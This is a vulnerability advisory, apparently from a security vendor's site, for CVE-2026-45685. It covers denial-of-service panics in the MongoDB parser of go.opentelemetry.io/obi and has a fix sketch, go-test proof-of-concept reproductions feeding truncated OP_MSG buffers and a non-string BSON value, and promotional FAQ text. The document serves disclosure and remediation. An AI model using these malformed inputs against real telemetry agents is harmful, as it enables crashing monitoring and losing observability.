Summary
Malformed MongoDB wire messages can trigger uncaught panics in the MongoDB TCP parser, allowing a remote unauthenticated attacker to crash the telemetry agent and cause a denial of service. The parser operates on raw attacker-controlled network payloads before the input is fully validated, so a single crafted message can terminate telemetry collection for the affected process or node.
Details
MongoDB parsing support was introduced by commit 2070f568a (Add Initial support for mongodb), so the earliest affected release is v0.1.0.
There are two related panic conditions in released go.opentelemetry.io/obi versions:
- In v0.1.0 through v0.3.0, parseOpMessage reads the OP_MSG flag bits from buf[msgHeaderSize:msgHeaderSize+int32Size] without first ensuring the buffer is at least msgHeaderSize + int32Size bytes long. A truncated OP_MSG packet can therefore trigger a slice-bounds panic before the parser returns an error.
- In v0.1.0 through v0.3.0, parseSections consumes the section type byte and then reads the document-sequence length from buf[offSet:offSet+int32Size] without re-validating that enough bytes remain after the type byte. A malformed document-sequence section can therefore trigger another slice-bounds panic.
- In v0.1.0 through v0.8.0, parseFirstField assumes the collection name for collection-scoped commands is always a string and performs an unchecked type assertion on field.Value. A malformed BSON document can therefore trigger a runtime panic with "interface conversion" instead of returning a parse error.
The bounds-check panic was fixed by commit 3aa58cdaaa97fbb72f8ef4c3609ae425aacaf8bb (Fix MongoDB client panic), which first appears in release v0.4.0. The unchecked BSON type assertion is still present in v0.8.0.
Because this code runs while decoding attacker-controlled MongoDB traffic, the failure mode is process termination rather than graceful rejection of invalid input. In deployments where the telemetry agent monitors traffic from untrusted or partially trusted clients, a single malformed packet can terminate collection until the agent is restarted.
Affected code paths are in pkg/ebpf/common/mongo_detect_transform.go and correspond to parseOpMessage, parseSections, and parseFirstField.
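The three checks the advisory describes, sketched as an added stand-alone Go example (not code from the OBI repository): the function names opMsgFlags, docSequenceLen and collectionName and the wire-format constants are constructed here, and each function returns an error on the malformed input that makes the unpatched parser panic.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Constructed constants mirroring the MongoDB wire format: a 16-byte header,
// then for OP_MSG a 4-byte flagBits field, then one or more sections.
const (
	msgHeaderSize               = 16
	int32Size                   = 4
	sectionTypeDocumentSequence = 1
)

// opMsgFlags returns OP_MSG flagBits, erroring instead of panicking when the
// buffer is shorter than header + flags (the v0.1.0-v0.3.0 parseOpMessage bug).
func opMsgFlags(buf []byte) (uint32, error) {
	if len(buf) < msgHeaderSize+int32Size {
		return 0, fmt.Errorf("mongo: message truncated")
	}
	return binary.LittleEndian.Uint32(buf[msgHeaderSize:]), nil
}

// docSequenceLen consumes the section type byte, then re-checks that a 4-byte
// length still fits before reading it (the v0.1.0-v0.3.0 parseSections bug).
func docSequenceLen(sec []byte) (int32, error) {
	if len(sec) < 1 || sec[0] != sectionTypeDocumentSequence {
		return 0, fmt.Errorf("mongo: not a document-sequence section")
	}
	if rest := sec[1:]; len(rest) < int32Size {
		return 0, fmt.Errorf("mongo: document-sequence length truncated")
	}
	return int32(binary.LittleEndian.Uint32(sec[1:])), nil
}

// collectionName models parseFirstField's lookup with a comma-ok assertion so a
// non-string BSON value yields an error (the v0.1.0-v0.8.0 type-assertion bug).
func collectionName(value any) (string, error) {
	s, ok := value.(string)
	if !ok {
		return "", fmt.Errorf("mongo: collection name is %T, not string", value)
	}
	return s, nil
}

func main() {
	_, err := opMsgFlags(make([]byte, 16)) // constructed 16-byte truncated OP_MSG
	fmt.Println("truncated OP_MSG:", err)
}
```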
PoC
The following reproductions are fully self-contained. They create a temporary test file inside an affected checkout and then run go test against the real parser code in the repository.
Reproduce the v0.1.0 through v0.3.0 bounds-check panics:

git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc
cd obi-poc
git checkout v0.3.0
cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF'
package ebpfcommon

import "testing"

func TestSecurityPoCParseOpMessageShortPanics(t *testing.T) {
	parseOpMessage(make([]byte, 16), 0, false, nil)
}

func TestSecurityPoCParseSectionsShortDocSequencePanics(t *testing.T) {
	parseSections([]byte{byte(sectionTypeDocumentSequence), 0x01, 0x02, 0x03})
}
EOF
go test ./pkg/ebpf/common -run 'TestSecurityPoCParseOpMessageShortPanics|TestSecurityPoCParseSectionsShortDocSequencePanics' -count=1

Expected result:
- TestSecurityPoCParseOpMessageShortPanics panics with a message similar to: slice bounds out of range [:20] with capacity 16
- TestSecurityPoCParseSectionsShortDocSequencePanics panics with a message similar to: slice bounds out of range [:5] with capacity 4

Reproduce the v0.1.0 through v0.8.0 unchecked BSON type-assertion panic:

git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc
cd obi-poc
git checkout v0.8.0
cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF'
package ebpfcommon

import (
	"testing"

	"go.mongodb.org/mongo-driver/v2/bson"
)

func TestSecurityPoCParseFirstFieldTypeAssertionPanics(t *testing.T) {
	parseFirstField(bson.E{Key: commFind, Value: int32(123)})
}
EOF
go test ./pkg/ebpf/common -run TestSecurityPoCParseFirstFieldTypeAssertionPanics -count=1

Expected result: panic with a message similar to: interface conversion: interface {} is int32, not string
Impact
This is a remote denial-of-service vulnerability in the MongoDB protocol parser. Any deployment that enables MongoDB parsing and processes attacker-controlled or malformed MongoDB traffic is impacted. Successful exploitation lets an unauthenticated attacker crash the telemetry agent by sending a crafted OP_MSG packet or malformed BSON document, causing loss of observability until the process is restarted.
The parser does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. The typical impact of this weakness class varies by context (data corruption, logic bypass, or denial of service); here it is denial of service.
CVE-2026-45685 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-45685? CVE-2026-45685 is a high-severity improper input validation vulnerability in go.opentelemetry.io/obi (go), affecting versions < 0.9.0. It is fixed in 0.9.0. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
- How severe is CVE-2026-45685? CVE-2026-45685 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of go.opentelemetry.io/obi are affected by CVE-2026-45685? go.opentelemetry.io/obi (go) versions < 0.9.0 are affected.
- Is there a fix for CVE-2026-45685? Yes. CVE-2026-45685 is fixed in 0.9.0. Upgrade to this version or later.
- Is CVE-2026-45685 exploitable, and should I be worried? Whether CVE-2026-45685 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-45685 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-45685? Upgrade go.opentelemetry.io/obi to 0.9.0 or later.